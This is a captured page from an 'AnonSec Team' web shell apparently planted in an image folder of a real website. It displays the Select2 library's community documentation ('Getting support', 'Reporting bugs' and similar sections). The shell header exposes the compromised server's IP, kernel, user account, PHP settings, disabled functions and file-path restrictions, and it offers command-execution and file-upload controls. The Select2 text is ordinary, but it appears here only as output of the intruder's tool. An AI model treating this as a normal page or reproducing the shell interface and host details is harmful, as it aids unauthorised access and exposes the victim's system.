AnonSec Team
Server IP : 124.109.2.77  /  Your IP : 216.73.216.49
Web Server : Apache/2
System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : cpctlp ( 1020)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329
OFF  |  Perl :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335
OFF  |  Python :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341
OFF
Directory (0755) :  /home/cpctlp/domains/cpctlphp.com/public_html/admin/vendors/select2/docs/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/cpctlp/domains/cpctlphp.com/public_html/admin/vendors/select2/docs/community.html
---
layout: default
title: Community - Select2
slug: community
---

<section class="jumbotron">
  <div class="container">
    <h1>
      Community
    </h1>
    <p class="lead">
      Select2 has an active community that enjoys helping each other out.
    </p>
  </div>
</section>

<div class="container">
  <section id="support">
    <div class="page-header">
      <h1>Getting support</h1>
    </div>

    <p>
      Having trouble getting Select2 working on your website? Is it not working
      together with another plugin, even though you think it should? Select2 has a
      few communities that you can go to for help getting it all working together.
    </p>

    <ol>
      <li>
        Try sending a message to the
        <a href="https://groups.google.com/d/forum/select2">
          Select2 discussion group
        </a>
        or searching the archives.
      </li>
      <li>
        Ask in the <code>#select2</code> channel on
        <code>chat.freenode.net</code> or use the
        <a href="https://webchat.freenode.net/?channels=select2">
          web irc client.
        </a>
      </li>
      <li>
        Raise a question on
        <a href="http://stackoverflow.com/">Stack Overflow</a>,
        make sure to include the
        <a href="http://stackoverflow.com/questions/tagged/jquery-select2?sort=votes">
          "jquery-select2"
        </a>
        tag.
      </li>
    </ol>
  </section>

  <section id="reporting-bugs">
    <div class="page-header">
      <h1>Reporting bugs</h1>
    </div>

    <p>
      Found a problem with Select2? Feel free to open a ticket on the Select2
      repository on GitHub, but you should keep a few things in mind:
    </p>

    <ol>
      <li>
        Use the
        <a href="https://github.com/select2/select2/search?q=&type=Issues">
          GitHub issue search
        </a>
        to check if your issue has already been reported.
      </li>
      <li>
        Try to isolate your problem as much as possible, so we can easily test if
        the issue has been fixed.
      </li>
      <li>
        Once you are sure the issue is with Select2, and not a third party
        library,
        <a href="https://github.com/select2/select2/issues/new">
          submit a ticket
        </a>
        to the repository.
      </li>
    </ol>

    <p>
      You can find more information on reporting bugs in the
      <a href="https://github.com/select2/select2/blob/master/CONTRIBUTING.md#reporting-bugs-with-select2">
        contributing guide,
      </a>
      including tips on what information to include.
    </p>
  </section>

  <section id="requesting-features">
    <div class="page-header">
      <h1>Requesting new features</h1>
    </div>

    <p>
      New feature requests are usually requested by the
      <a href="https://github.com/select2/select2/issues">
        Select2 community on GitHub,
      </a>
      and are often fulfilled by
      <a href="#contributing">
        fellow contributors.
      </a>
    </p>

    <ol>
      <li>
        Use the
        <a href="https://github.com/select2/select2/search?q=&type=Issues">
          GitHub issue search
        </a>
        to check if your feature has already been requested.
      </li>
      <li>
        Check if it hasn't already been implemented as a
        <a href="">
          third party plugin.
        </a>
      </li>
      <li>
        Please make sure you are only requesting a single feature, and not a
        collection of smaller features.
      </li>
    </ol>

    <p>
      You can find more information on requesting new features in the
      <a href="https://github.com/select2/select2/blob/master/CONTRIBUTING.md#requesting-features-in-select2">
        contributing guide.
      </a>
    </p>
  </section>

  <section id="contributing">
    <div class="page-header">
      <h1>Getting involved</h1>
    </div>

    <p>
      You can find more information on getting involved with Select2 in the
      <a href="https://github.com/select2/select2/blob/master/CONTRIBUTING.md#triaging-issues-and-pull-requests">
        contributing guide.
      </a>
    </p>
  </section>
</div>

AnonSec - 2021